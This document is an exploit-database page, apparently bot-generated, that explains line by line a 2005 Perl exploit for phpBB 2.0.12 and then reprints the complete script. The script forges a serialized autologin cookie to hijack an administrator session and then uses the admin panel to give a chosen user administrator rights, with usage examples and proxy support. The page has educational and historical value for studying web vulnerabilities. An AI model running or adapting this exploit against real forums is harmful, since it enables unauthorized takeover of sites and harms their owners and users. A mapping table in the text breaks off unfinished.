By exploitdb papers bot•March 21, 2005•
papers
phpBB 2.0.12 Authentication Bypass via Session Manipulation
phpBB 2.0.12 Authentication Bypass via Session Manipulation
What this paper is
This paper details an exploit for phpBB version 2.0.12 that allows an attacker to bypass authentication and grant administrative privileges to a specified user. The vulnerability lies in how the autologinid cookie is handled, allowing an attacker to manipulate session data to impersonate an administrator or gain administrative access.
Simple technical breakdown
The exploit works by crafting a specific cookie that, when sent to a vulnerable phpBB installation, tricks the server into believing the user has administrative rights. This is achieved by manipulating the phpbb2mysql_data cookie, which stores user session information. The script then uses this manipulated cookie to access the administrative control panel and assign administrator privileges to a target user.
Complete code and payload walkthrough
The provided Perl script is designed to automate the exploitation process. Let's break down its components:
#!/usr/bin/perl -w
# phpBB <=2.0.12 session autologin exploit
# This script uses the vulerability in autologinid variable
# More: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=267563
#
# Just gives an user on vulnerable forum administrator rights.
# You should register the user before using this ;-)
# by Kutas, kutas@mail15.com
#P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
# but greets goes to Paisterist who made an exploit for Firefox cookies...- Shebang and Comments:
#!/usr/bin/perl -w: Specifies the interpreter as Perl and enables warnings (-w) for better debugging.- The comments explain the script's purpose: exploiting a session autologin vulnerability in phpBB <= 2.0.12 using the
autologinidvariable. It also mentions the prerequisite of registering the target user beforehand and credits the author.
if (@ARGV < 3)
{
print q(
+++++++++++++++++++++++++++++++++++++++++++++++++++
Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++++
);
exit;
}- Argument Handling:
if (@ARGV < 3): Checks if fewer than 3 command-line arguments are provided.print q(...): If insufficient arguments are given, it prints a usage message explaining the required parameters:[site],[phpbb folder],[username], and an optional[proxy].exit;: Terminates the script if arguments are missing.
use strict;
use LWP::UserAgent;- Module Inclusion:
use strict;: Enforces strict variable declaration and other good coding practices.use LWP::UserAgent;: Imports theLWP::UserAgentmodule, which is used for making HTTP requests.
my $host = $ARGV[0];
my $path = $ARGV[1];
my $user = $ARGV[2];
my $proxy = $ARGV[3];
my $request = "http://";
$request .= $host;
$request .= $path;- Variable Assignment:
my $host = $ARGV[0];: Assigns the first command-line argument (the website domain) to$host.my $path = $ARGV[1];: Assigns the second argument (the phpBB installation path) to$path.my $user = $ARGV[2];: Assigns the third argument (the username to grant admin rights) to$user.my $proxy = $ARGV[3];: Assigns the fourth argument (optional proxy address) to$proxy.my $request = "http://"; $request .= $host; $request .= $path;: Constructs the base URL for the phpBB installation.
use HTTP::Cookies;
my $browser = LWP::UserAgent->new ();
my $cookie_jar = HTTP::Cookies->new( );
$browser->cookie_jar( $cookie_jar );
$cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);- Cookie Manipulation:
use HTTP::Cookies;: Imports theHTTP::Cookiesmodule for managing cookies.my $browser = LWP::UserAgent->new ();: Creates a newLWP::UserAgentobject.my $cookie_jar = HTTP::Cookies->new( );: Creates a new cookie jar.$browser->cookie_jar( $cookie_jar );: Associates the cookie jar with the user agent.$cookie_jar->set_cookie(...): This is the core of the exploit. It sets a specific cookie namedphpbb2mysql_data.- The value
"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"is a URL-encoded string. When decoded, it represents a PHP serialized array:a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}. - This serialized data, when interpreted by phpBB, indicates:
autologinidis set to1(boolean true), which is likely a flag to enable autologin or a similar session persistence mechanism.useridis set to"2". This is crucial. By setting a lowuserid(like '2') and manipulating theautologinid, the script attempts to trick the server into thinking it's a valid, potentially administrative session. The actual user ID of the target user will be fetched later. The '2' here is a placeholder and the exploit relies on the server not strictly validating this against the current session.
- The value
if ( defined $proxy) {
$proxy =~ s/(http:\/\/)//eg;
$browser->proxy("http" , "http://$proxy");
}- Proxy Configuration:
if ( defined $proxy): Checks if a proxy argument was provided.$proxy =~ s/(http:\/\/)//eg;: Removes any leading "http://" from the proxy string to ensure it's just the host and port.$browser->proxy("http" , "http://$proxy");: Configures theLWP::UserAgentto use the specified proxy for HTTP requests.
print "++++++++++++++++++++++++++++++++++++\n";
print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}
my $response = $browser->get($request);
die "Error: ", $response->status_line
unless $response->is_success;
if($response->content =~ m/phpbbprivmsg/) {
print "\n Forum is vulnerable!!!\n";
} else {
print "Sorry... Not vulnerable"; exit();}- Initial Connection and Vulnerability Check:
- Prints connection details.
my $response = $browser->get($request);: Makes a GET request to the base phpBB URL with the crafted cookie.die "Error: ", $response->status_line unless $response->is_success;: Exits if the request fails.if($response->content =~ m/phpbbprivmsg/): Checks the content of the response for the string "phpbbprivmsg". This string is likely present on a page accessible to authenticated users (or users with a valid session, even if manipulated). If found, it indicates the forum is likely vulnerable.- If "phpbbprivmsg" is not found, it prints "Sorry... Not vulnerable" and exits.
print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";
$response->content =~ /sid=([\w\d]*)/;
my $sid = $1;
$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
$response = $browser->post(
$request,
[
'username' => $user,
'mode' => 'edit',
'mode' => 'user',
'submituser' => 'Look+up+User'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
if ($response->content =~ /name="u" value="([\d]*)"/)
{print " Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
else {print "No user $user found..."; exit(); }
my $uid = $1;- Retrieving User ID:
$response->content =~ /sid=([\w\d]*)/; my $sid = $1;: Extracts the session ID (sid) from the previous response. Thissidis likely obtained from a hidden form field or URL parameter on the page.$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";: Appends the path to the user group authentication administration page, including the extractedsid.- The script then performs a POST request to this admin page.
[ 'username' => $user, 'mode' => 'edit', 'mode' => 'user', 'submituser' => 'Look+up+User' ]: These are the form parameters sent in the POST request. The goal is to search for the target$userby submitting their username. Note that'mode' => 'user'is repeated, which is likely a typo or an artifact of how the form submission is constructed; the last one typically overwrites previous ones. The key parameter is'username' => $userand'submituser' => 'Look+up+User'to initiate the search.if ($response->content =~ /name="u" value="([\d]*)"/): After submitting the search, the script checks the response content for a hidden input field named "u" which contains the numerical user ID.my $uid = $1;: If found, the user ID is extracted and stored in$uid.- If the user ID is not found, an error message is printed, and the script exits.
print "Trying to give user:$user admin status...\n";
$response = $browser->post(
$request,
[
'userlevel' => 'admin',
'mode' => 'user',
'adv'=>'',
'u'=> $uid,
'submit'=> 'Submit'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
print " Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";- Granting Administrator Privileges:
$response = $browser->post(...): Another POST request is made to the sameadmin_ug_auth.phppage.[ 'userlevel' => 'admin', 'mode' => 'user', 'adv'=>'', 'u'=> $uid, 'submit'=> 'Submit' ]: These are the parameters to grant admin rights.'userlevel' => 'admin': Explicitly sets the user level to 'admin'.'mode' => 'user': Likely specifies the action to perform on the user.'adv'=>'': This might be related to advanced settings, left empty.'u'=> $uid: Specifies the user ID to modify.'submit'=> 'Submit': Submits the changes.
die "Error: ", $response->status_line unless $response->is_success;: Exits on error.print " Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";: If the request is successful, it prints a success message.
# milw0rm.com [2005-03-21]- Exploit Source: Indicates the source of the exploit.
Mapping of code fragment/block to practical purpose:
| Code Fragment/Block
Original Exploit-DB Content (Verbatim)
#!/usr/bin/perl -w
# phpBB <=2.0.12 session autologin exploit
# This script uses the vulerability in autologinid variable
# More: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=267563
#
# Just gives an user on vulnerable forum administrator rights.
# You should register the user before using this ;-)
# by Kutas, kutas@mail15.com
#P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
# but greets goes to Paisterist who made an exploit for Firefox cookies...
if (@ARGV < 3)
{
print q(
+++++++++++++++++++++++++++++++++++++++++++++++++++
Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++++
);
exit;
}
use strict;
use LWP::UserAgent;
my $host = $ARGV[0];
my $path = $ARGV[1];
my $user = $ARGV[2];
my $proxy = $ARGV[3];
my $request = "http://";
$request .= $host;
$request .= $path;
use HTTP::Cookies;
my $browser = LWP::UserAgent->new ();
my $cookie_jar = HTTP::Cookies->new( );
$browser->cookie_jar( $cookie_jar );
$cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);
if ( defined $proxy) {
$proxy =~ s/(http:\/\/)//eg;
$browser->proxy("http" , "http://$proxy");
}
print "++++++++++++++++++++++++++++++++++++\n";
print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}
my $response = $browser->get($request);
die "Error: ", $response->status_line
unless $response->is_success;
if($response->content =~ m/phpbbprivmsg/) {
print "\n Forum is vulnerable!!!\n";
} else {
print "Sorry... Not vulnerable"; exit();}
print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";
$response->content =~ /sid=([\w\d]*)/;
my $sid = $1;
$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
$response = $browser->post(
$request,
[
'username' => $user,
'mode' => 'edit',
'mode' => 'user',
'submituser' => 'Look+up+User'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
if ($response->content =~ /name="u" value="([\d]*)"/)
{print " Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
else {print "No user $user found..."; exit(); }
my $uid = $1;
print "Trying to give user:$user admin status...\n";
$response = $browser->post(
$request,
[
'userlevel' => 'admin',
'mode' => 'user',
'adv'=>'',
'u'=> $uid,
'submit'=> 'Submit'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
print " Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";
# milw0rm.com [2005-03-21]